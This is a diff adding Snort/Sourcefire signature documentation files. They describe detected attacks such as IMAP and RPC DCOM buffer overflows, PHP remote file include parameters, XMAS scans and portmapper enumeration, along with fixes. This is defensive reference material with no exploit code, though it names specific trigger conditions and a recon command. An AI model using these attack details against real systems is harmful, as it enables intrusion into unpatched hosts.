+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3068.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+3068
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"examine" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+In the case of Ipswitch IMail, an overly long mailbox name supplied as a
+parameter to the examine command may be a trigger condition of a buffer
+overflow. A name of 259 bytes or more may cause this to occur.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+	Ipswitch IMail 8.1.3
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1671.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1671
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000433.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000433
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "viewer.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "viewer.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3178.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3178
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/818.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+818
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3090.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3090
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2149.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 2149
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The Turba of Horde PHP application allows a user to request the status.php file which may disclose valuable information about the host and the application.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using Turba of Horde php application.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2681.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2681
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure sdo_code_size
+. This procedure is included in
+mdsys.sdo_admin.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000411.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000411
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/625.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+625
+
+Summary:
+--
+A TCP packet with all of the (unreserved) control bits set was
+detected as being destined for your machine. 
+
+--
+Impact:
+System recon.  Different operating-systems will respond in different
+ways depending on their particular stack implementation.  This allows
+attackers to determine things such as open/closed ports, ACLs, and the
+like.
+
+--
+Detailed Information:
+The ACK, FIN, PSH, RST, SYN, and URG control bits were set in a TCP
+packet.  
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a recon mission that may be an indicator to upcoming
+attacks, an attacker may attempt to determine what ports are listening
+on a given machine by sending a TCP packet with all of its control
+bits "lit up", hence the name XMAS scan -- its "lit up like a
+christmas tree."
+__
+Ease of Attack:
+Trivial.  Many of the popular portscanners/vulnerability testers, most
+notably nmap, allow anyone to inititiate an XMAS scan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what information an attacker may have gleaned from this
+attack.  Would your ports show as open or closed?  Consider
+implementing a stateful firewall on the victim machine, or at ingress
+points on your network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+http://rr.sans.org/firewall/egress.php
+
+--
--- /dev/null
+++ b/doc/signatures/2584.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1102
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the peer to peer (p2p) client eMule.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the p2p application eMule. The eMule client is prone to
+a buffer overflow condition which may present an attacker with the
+opportunity to execute code of their choosing on a vulnerable host.
+
+The issue surrounds the IRC module and the Web server portions of the
+client. Sufficient bounds checking of user supplied data is not
+correctly implemented causing the opportunity to overflow a buffer.
+
+--
+Affected Systems:
+	All systems using eMule.
+
+--
+Attack Scenarios:
+An attacker can supply overly long data in an IRC session between two
+clients to trigger the overflow.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/598.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+598
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on which ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about what RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
--- /dev/null
+++ b/doc/signatures/2858.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2858
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1788.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1788
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1618.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1618
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with chunked encoding processing of Active Server Pages (ASP) in Internet Information Services (IIS). 
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access of the target host. 
+
+--
+Detailed Information:
+A buffer overflow exists with chunked encoding processing associated with ASP in IIS.  Chunked encoding allows different sized chunks of data to be passed from the web client to the server.  A heap overflow vulnerability exists because of an error in chunked encoding data transfer associated with the Internet Services Application Programming Interface (ISAPI) extension that implements ASP.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+  Cisco Building Broadband Service Manager 5.0
+  Cisco Call Manager 1.0, 2.0, 3.0
+  Cisco ICS 7750
+  Cisco IP/VC 3540
+  Cisco Unity Server 2.0, 2.2, 2.3, 2.4
+  Cisco uOne 1.0, 2.0, 3.0, 4.0
+  Microsoft BackOffice 4.0, 4.5
+  Microsoft Windows NT 4.0 Option Pack
+
+Microsoft IIS 5.0
+  Microsoft Windows 2000 Advanced Server, SP1, SP2
+  Microsoft Windows 2000 Datacenter Server SP1, SP2
+  Microsoft Windows 2000 Professional, SP1, SP2
+  Microsoft Windows 2000 Server, SP1, SP2
+
+--
+Attack Scenarios:
+An attacker can craft a chunked encoded request to exploit the heap overflow.
+
+--
+Ease of Attack:
+Easy.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the cumulative patch Q319733.
+
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0079
+
+Bugtraq
+http://www.securityfocus.com/bid/4485
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1965.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) ToolTalk.
+
+--
+Impact:
+Remote root access. This attack may permit the execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications to communicate in the Common
+Desktop Environment (CDE).  The ToolTalk service receives ToolTalk
+messages created and sent by applications and delivers them to the
+appropriate recipient applications.  The ToolTalk database server is
+enabled by default on hosts with CDE.  A function in the code receives
+an argument for a pathname.  If an overly long pathname is passed to the
+function, a buffer overflow may occur, possibly allowing the execution
+of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+	HP HP-UX 10.10, 10.20, 10.30, 11.0
+	IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+	SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+	Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3,
+	2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs.  Alternately, an attacker may attempt to execute the
+exploit code on any listening port in the RPC range if the portmapper is
+blocked.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1412.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1412
+
+--
+
+Summary:
+This event is generated when an SNMP connection over TCP using the 
+default 'public' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'public' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/2364.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2364
+
+--
+Summary:
+This event is generated when an attempt is made to access a file that
+has a known vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made access the file
+options_form.php used in the PHP application Cyboards. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Cyboards Cyboards PHP Lite 1.21
+	Cyboards Cyboards PHP Lite 1.25
+
+--
+Attack Scenarios:
+My manipulating certain variables contained in a PHP script an attacker
+may be able to supply code of their choosing and execute it on the
+server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1937.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability using the LIST command on mail servers running 
+the qpopper daemon.
+
+--
+Impact: Remote Access. 
+This attack can allow an attacker to read other users mail as the Group 
+ID mail.
+
+--
+Detailed Information: 
+The attacker needs the username and password of a POP account on the 
+server.  After a successful POP login, the attacker can cause a buffer 
+overflow using the LIST command.  After successfully exploiting the 
+qpopper daemon the attacker has remote access of the server with the UID
+of the username used for the POP login and the GID of 'mail'.
+
+--
+Affected Systems: 
+	Qualcomm qpopper 3.0 and 3.0 beta 1 through beta 29.
+
+--
+Attack Scenarios: 
+An attacker can log in to a vulnerable mail server using a preexisting 
+POP account and enter an overly long argument with the LIST command, 
+causing a buffer overflow which may then result in remote access.
+
+--
+Ease of Attack: 
+Simple.  Exploits exist.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None Known.
+
+--
+Corrective Action: 
+Upgrade to Qualcomm qpopper 3.0 beta 30 or higher.
+
+--
+Contributors: 
+Snort documentation contributed by Chris Davis <christopher.davis@guardent.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:  
+cve: CAN-2000-0096
+bugtraq: 948
+
+--
--- /dev/null
+++ b/doc/signatures/1467.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1467
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
